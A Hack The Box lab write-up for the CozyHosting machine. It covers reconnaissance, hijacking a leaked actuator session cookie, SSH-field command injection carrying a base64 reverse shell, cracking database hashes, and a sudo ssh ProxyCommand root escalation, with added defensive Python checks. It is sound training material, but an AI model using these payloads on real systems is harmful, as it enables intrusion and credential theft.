CozyHosting Lab
Hack the Box Penetration Lab
Reconnaissance
First up, a port scan:
┌─[zero@parrot]─[~]
└──╼ $nmap -p- -sCV 10.10.11.230
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-05 11:19 PST
Nmap scan report for cozyhosting.htb (10.10.11.230)
Host is up (0.037s latency).
Not shown: 65471 closed tcp ports (conn-refused), 61 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 43:56:bc:a7:f2:ec:46:dd:c1:0f:83:30:4c:2c:aa:a8 (ECDSA)
|_ 256 6f:7a:6c:3f:a6:8d:e2:75:95:d4:7b:71:ac:4f:7e:42 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Cozy Hosting - Home
|_http-server-header: nginx/1.18.0 (Ubuntu)
1111/tcp open lmsocialserver?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
The scan revealed three open TCP ports: 22, 80 and 1111. Not knowing exactly what an lmsocialserver? was, I quickly googled it, which turned up some random 19-year-old forum posts that didn't tell me much. From earlier research I know there are some nginx vulnerabilities and a tool called nginxpwner, but I will dig further before trying anything.
Then a fuzz scan:
┌─[zero@parrot]─[~]
└──╼ $./feroxbuster -u http://cozyhosting.htb -w SecLists/Discovery/Web-Content/raft-large-directories.txt -k
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.1
───────────────────────────┬──────────────────────
🎯 Target Url │ http://cozyhosting.htb
🚀 Threads │ 50
📖 Wordlist │ SecLists/Discovery/Web-Content/raft-large-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.1
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔓 Insecure │ true
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 1l 2w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 34l 172w 14934c http://cozyhosting.htb/assets/img/pricing-starter.png
200 GET 29l 131w 11970c http://cozyhosting.htb/assets/img/pricing-free.png
200 GET 38l 135w 8621c http://cozyhosting.htb/assets/img/favicon.png
200 GET 43l 241w 19406c http://cozyhosting.htb/assets/img/pricing-business.png
200 GET 38l 135w 8621c http://cozyhosting.htb/assets/img/logo.png
200 GET 79l 519w 40905c http://cozyhosting.htb/assets/img/values-2.png
200 GET 97l 196w 4431c http://cozyhosting.htb/login
200 GET 73l 470w 37464c http://cozyhosting.htb/assets/img/values-1.png
200 GET 29l 174w 14774c http://cozyhosting.htb/assets/img/pricing-ultimate.png
200 GET 81l 517w 40968c http://cozyhosting.htb/assets/img/hero-img.png
200 GET 7l 1222w 80420c http://cozyhosting.htb/assets/vendor/bootstrap/js/bootstrap.bundle.min.js
200 GET 295l 641w 6890c http://cozyhosting.htb/assets/js/main.js
200 GET 2018l 10020w 95609c http://cozyhosting.htb/assets/vendor/bootstrap-icons/bootstrap-icons.css
200 GET 83l 453w 36234c http://cozyhosting.htb/assets/img/values-3.png
200 GET 1l 218w 26053c http://cozyhosting.htb/assets/vendor/aos/aos.css
200 GET 2397l 4846w 42231c http://cozyhosting.htb/assets/css/style.css
200 GET 1l 313w 14690c http://cozyhosting.htb/assets/vendor/aos/aos.js
401 GET 1l 1w 97c http://cozyhosting.htb/admin
204 GET 0l 0w 0c http://cozyhosting.htb/logout
200 GET 1l 625w 55880c http://cozyhosting.htb/assets/vendor/glightbox/js/glightbox.min.js
200 GET 7l 2189w 194901c http://cozyhosting.htb/assets/vendor/bootstrap/css/bootstrap.min.css
500 GET 1l 1w 73c http://cozyhosting.htb/error
200 GET 14l 1684w 143706c http://cozyhosting.htb/assets/vendor/swiper/swiper-bundle.min.js
200 GET 285l 745w 12706c http://cozyhosting.htb/
200 GET 285l 745w 12706c http://cozyhosting.htb/index
400 GET 1l 32w 435c http://cozyhosting.htb/plain]
400 GET 1l 32w 435c http://cozyhosting.htb/[
400 GET 1l 32w 435c http://cozyhosting.htb/]
400 GET 1l 32w 435c http://cozyhosting.htb/quote]
400 GET 1l 32w 435c http://cozyhosting.htb/extension]
400 GET 1l 32w 435c http://cozyhosting.htb/[0-9]
400 GET 1l 32w 435c http://cozyhosting.htb/20[0-9][0-9]
400 GET 1l 32w 435c http://cozyhosting.htb/[0-1][0-9]
400 GET 1l 32w 435c http://cozyhosting.htb/[2]
400 GET 1l 32w 435c http://cozyhosting.htb/^[0-9]
200 GET 1l 1w 634c http://cozyhosting.htb/actuator
400 GET 1l 32w 435c http://cozyhosting.htb/[2-9]
400 GET 1l 32w 435c http://cozyhosting.htb/options[]
[####################] - 5m 62320/62320 0s found:38 errors:0
[####################] - 5m 62283/62283 195/s http://cozyhosting.htb/
┌─[zero@parrot]─[~]
└──╼ $./feroxbuster -u http://cozyhosting.htb/actuator -w SecLists/Discovery/Web-Content/raft-medium-directories.txt -k
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.1
───────────────────────────┬──────────────────────
🎯 Target Url │ http://cozyhosting.htb/actuator
🚀 Threads │ 50
📖 Wordlist │ SecLists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.1
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔓 Insecure │ true
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 1l 2w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 1l 1w 634c http://cozyhosting.htb/actuator
200 GET 1l 1w 48c http://cozyhosting.htb/actuator/sessions
200 GET 1l 1w 15c http://cozyhosting.htb/actuator/health
400 GET 1l 32w 435c http://cozyhosting.htb/actuator/[
400 GET 1l 32w 435c http://cozyhosting.htb/actuator/plain]
200 GET 1l 120w 4957c http://cozyhosting.htb/actuator/env
400 GET 1l 32w 435c http://cozyhosting.htb/actuator/]
400 GET 1l 32w 435c http://cozyhosting.htb/actuator/quote]
200 GET 1l 542w 127224c http://cozyhosting.htb/actuator/beans
400 GET 1l 32w 435c http://cozyhosting.htb/actuator/extension]
400 GET 1l 32w 435c http://cozyhosting.htb/actuator/[0-9]
[####################] - 3m 30002/30002 0s found:11 errors:0
[####################] - 3m 30000/30000 170/s http://cozyhosting.htb/actuator/
The first fuzz scan revealed a decent number of pages to explore: login, logout, admin, index and actuator. I then ran a further fuzz scan against actuator, since that one stood out to me as a non-default page.
After doing so I found more pages that could possibly have a foothold within them: sessions, health, env and beans.
Before checking those out, I dug into the source code of the main page to see what it was built off of and if I could find anything of interest.
<link href="assets/vendor/bootstrap-icons/bootstrap-icons.css" rel="stylesheet">
<link href="assets/css/style.css" rel="stylesheet">
<!-- =======================================================
* Template Name: FlexStart
* Updated: Mar 10 2023 with Bootstrap v5.2.3
* Template URL: https://bootstrapmade.com/flexstart-bootstrap-startup-template/
* Author: BootstrapMade.com
* License: https://bootstrapmade.com/license/
======================================================== -->
</head>
The first thing I noticed was that the site was built from a BootstrapMade template (FlexStart), with a direct link to their website. Nothing there really stood out to me, though.
Looking back at the URL paths I found, there was a strange occurrence when visiting /actuator/health and /actuator/env: both appeared to be somewhat broken endpoints, which could be useful. However, after looking at /actuator/sessions I found what appears to be a session cookie for a user called kanderson. This could be the foothold I was looking for: a session hijack using this cookie.
8EAC013F0A6A9CCE2F06166E0F91FBEB: "kanderson"
After opening my inspect element and replacing my cookie with kanderson’s I was able to bypass the login screen and load into the admin dashboard.
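As an added defender-side check (not part of the writeup or the box), this takes the /actuator index that feroxbuster found and the sessions body seen on this box and reports which sensitive endpoints are reachable and how many live session IDs per principal are leaking. The sensitivity list is my own ranking (an assumption, not a Spring Boot classification), and the `{"<id>": "<principal>"}` shape is what this box returned rather than the stock Spring Session endpoint.

```python
import json
from collections import Counter

# Actuator endpoints worth alarming on when reachable without authentication.
# The ranking and wording are my own (assumption), not a Spring Boot list.
SENSITIVE = {
    "sessions": "live session IDs (cookie reuse, as on this box)",
    "env": "config properties, often credentials and DB URLs",
    "heapdump": "JVM heap snapshot, secrets in memory",
    "beans": "application wiring and internal structure",
    "mappings": "every HTTP route the app serves",
}

def exposed_sensitive(index_json: str) -> dict:
    """Parse the HATEOAS index served at /actuator and return the sensitive
    endpoints it advertises, mapped to why each one matters."""
    links = json.loads(index_json).get("_links", {})
    found = {}
    for name in links:
        base = name.split("-")[0]          # "env-toMatch" -> "env"
        if base in SENSITIVE:
            found[base] = SENSITIVE[base]
    return found

def leaked_sessions(sessions_json: str) -> dict:
    """Count live session IDs per principal; the {"<id>": "<principal>"}
    shape is the custom one this box's /actuator/sessions returned."""
    return dict(Counter(json.loads(sessions_json).values()))

# Constructed /actuator index modelled on the endpoints feroxbuster found.
BASE = "http://cozyhosting.htb/actuator"
SAMPLE_INDEX = json.dumps({"_links": {
    "self": {"href": BASE, "templated": False},
    "health": {"href": BASE + "/health", "templated": False},
    "sessions": {"href": BASE + "/sessions", "templated": False},
    "env": {"href": BASE + "/env", "templated": False},
    "env-toMatch": {"href": BASE + "/env/{toMatch}", "templated": True},
    "beans": {"href": BASE + "/beans", "templated": False},
}})
# Three of the entries from the sessions body captured with curl on this box.
SAMPLE_SESSIONS = ('{"C0F9E22583CAF00F5EEF4D06C378CD29":"kanderson",'
                   '"DEA37E9DC95C746A6C893B0EF2DC9E46":"UNAUTHORIZED",'
                   '"F5706B25C94359D796AA494D5586677C":"kanderson"}')

if __name__ == "__main__":
    for ep, why in exposed_sensitive(SAMPLE_INDEX).items():
        print(f"EXPOSED /actuator/{ep}: {why}")
    for user, n in leaked_sessions(SAMPLE_SESSIONS).items():
        print(f"{n} live session id(s) leaked for {user}")
```

On the application side the fix is to limit management.endpoints.web.exposure.include to the endpoints actually needed (health is the usual minimum) and to require authentication for anything else.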

I did find that I was kicked out of the dashboard every so often. It seems the cookie became invalid after a certain amount of time. So I used a curl command in my terminal to grab a new cookie to carry on trying to find more of a foothold.
┌─[zero@parrot]─[~]
└──╼ $curl -i -k http://cozyhosting.htb/actuator/sessions
HTTP/1.1 200
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 20 Feb 2024 19:19:22 GMT
Content-Type: application/vnd.spring-boot.actuator.v3+json
Transfer-Encoding: chunked
Connection: keep-alive
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
X-Frame-Options: DENY
{"C0F9E22583CAF00F5EEF4D06C378CD29":"kanderson","DEA37E9DC95C746A6C893B0EF2DC9E46":"UNAUTHORIZED","7581D8F66C4A37806FC9B8D92C05C419":"UNAUTHORIZED","F5706B25C94359D796AA494D5586677C":"kanderson","E922E0095DF399023C5DCBA4A33AD1D2":"kanderson","CCA059D462C590145236FF2A0A8092DA":"UNAUTHORIZED"}
Interestingly, I found there was a remote host connection tool. After entering a few random combinations of Hostname and Username I got a timeout error. The one that stood out to me was an HTTP Status 400 error.
Here are some of the errors that I got:
ssh: Could not resolve hostname qwe: Temporary failure in name resolution
ssh: connect to host 0.0.0.123 port 22: Connection timed out
Host key verification failed.
HTTP Status 400 – Bad Request

I fired up BurpSuite to see what kinds of requests are being made when I am hitting the submit button. Entering a default IP address of 127.0.0.1 with no Username threw up this raw response in BurpSuite:

(Note, around this time I had made the switch to Kali from ParrotOS. Kali seems so much quicker and the UI is a lot sleeker.)
Judging by line 5, the backend was trying to execute the command directly with SSH, which could be prime for manipulation. Admittedly, at this point I was a little stuck. Looking at another write-up online, I found that if you put a ' after the username you can trigger something to make sure it's a bash shell.

Accessing the system
Now to create a bash file in order to get a reverse shell, then attempt to get a stable shell after that. This is the bash file that I would attempt to upload to their side of the server. I chose a port number and set up a listener.
echo "bash -i >& /dev/tcp/[YOUR IP]/[PORT] 0>&1" | base64 -w 0
echo${IFS%??}"YmFzaCAtaSA+JiAvZGV2L3RcC8xMC4xMC4xNC4yMTEvOTAwMCAwPiYxCg=="${IFS%??}|${IFS%??}base64${IFS%??}-d${IFS%??}|${IFS%??}bash;

After converting my payload to base64 and copy-pasting it into the username field I was able to gain access to the shell. I then needed to make it a stable shell.
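As an added example (mine, not the box's code or the writeup's), here is the pattern the error messages above point to, next to a hardened version: stripping spaces from the username does nothing against `${IFS}`, because the shell expands it after the filter ran, whereas validating against an allowlist and passing an argv list with no shell leaves nothing for metacharacters to act on. The regexes are my own choice, and the injected value is a simplified shape of the payload above.

```python
import re
import subprocess

# Allowlists (my choice, assumption): DNS-ish hostnames and POSIX-style usernames.
HOST_RE = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252})")
USER_RE = re.compile(r"[a-z_][a-z0-9_-]{0,31}")

def naive_filter(value: str) -> str:
    """The blocklist a developer might reach for: drop spaces. It does nothing
    against ${IFS}, which the shell expands to whitespace after the filter ran."""
    return value.replace(" ", "")

def vulnerable_command(username: str, hostname: str) -> str:
    """Pattern the writeup infers from the error messages: fields spliced into a
    shell string and run with shell=True. Returned here, deliberately not run."""
    return f"ssh {naive_filter(username)}@{naive_filter(hostname)} id"

def hardened_argv(username: str, hostname: str) -> list:
    """Validate both fields against allowlists, then build an argv list so no
    shell ever parses them. Rejected input raises instead of reaching ssh."""
    if not USER_RE.fullmatch(username):
        raise ValueError("username rejected")
    if not HOST_RE.fullmatch(hostname):
        raise ValueError("hostname rejected")
    return ["ssh", "-o", "BatchMode=yes", "-o", "ConnectTimeout=5",
            f"{username}@{hostname}", "id"]

def run_hardened(username: str, hostname: str) -> subprocess.CompletedProcess:
    """Execute without a shell: metacharacters in argv are just bytes to ssh."""
    return subprocess.run(hardened_argv(username, hostname),
                          capture_output=True, text=True, check=False)

if __name__ == "__main__":
    injected = "kanderson;${IFS}id"     # simplified shape of the payload above
    print(vulnerable_command(injected, "127.0.0.1"))   # ';' and ${IFS} survive
    try:
        hardened_argv(injected, "127.0.0.1")
    except ValueError as err:
        print("hardened path:", err)
    print(hardened_argv("josh", "127.0.0.1"))
```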

To gain a more stable shell I used this python script, note do this every single time you log back in:
python3 -c 'import pty;pty.spawn("/bin/bash")'
After doing this I just poked around a little to see who I am, what IDs there are and what files are under the current directory.

It looks like there is a .jar file that would be nice to dig into. I then set up a listener on the target machine for me to then grab the file from my machine using wget.
sudo wget http://10.10.11.230:4444/cloudhosting-0.0.1.jar


After a brief search using jd-gui, I found the username and password for a database called "cozyhosting". I then logged back into the machine using the same steps as above.
The machine was very slow at this point and would constantly be stuck loading, even when inside the machine itself. I ended up switching my HTB VPN to TCP, which seems to have fixed the connectivity issues.
I went ahead and did a little research on how to interact with a postgres database. I used the following to attempt to login:
psql -h 127.0.0.1 -U postgres
After using the password to log in, I was able to connect to the cozyhosting database and view the contents of the users table. This revealed the password hashes for both "kanderson" and "admin". Next step: using John the Ripper to crack this password.

I copied and pasted the admin's hashed password into a text file called hash. Next I ran John with the rockyou.txt list, revealing the password below:

So with this password I attempted to login using the username admin then the password that I had just cracked. Sadly the username admin didn’t exist, so this password must belong to someone else. I chose to list the dir in the home dir to see if I could find another username.

Turns out there is a user called “josh”. Now let’s try and login using his username and the password we got earlier. Success! We logged in using that combination of username and password. Exploring their files I find the user flag in a file called user.txt!

The final root flag was a little tricky; I didn't know how to get root access from the shell. After a little research, it looks like if the current user can run ssh as root via sudo, there is a small payload that can be used to gain root: https://gtfobins.github.io/gtfobins/ssh/#sudo.
sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x

After that it was a pretty simple hunt for the flag: root/root.txt!
Conclusion
This took me quite a while to complete. I got stuck when creating the bash reverse shell script. I had one noted down from some of the HTB tutorials, but didn't know you had to URL-encode the key characters, which can be done in BurpSuite. PSQL was also something I was not familiar with, so looking up the documentation for that and some examples really helped.
Speaking of BurpSuite, I learned a lot more about using its basic functionality. I am still not 100% confident on using it to send a request, but using the fields on the website I was able to do it manually. I am sure later down the line I will need to use it to inject code, so that will be a good learning experience.
Overall I am pretty happy with my first box, it took a little bit of research and help from another user’s write-up, but learning a lot and making plenty of notes for the future is always good.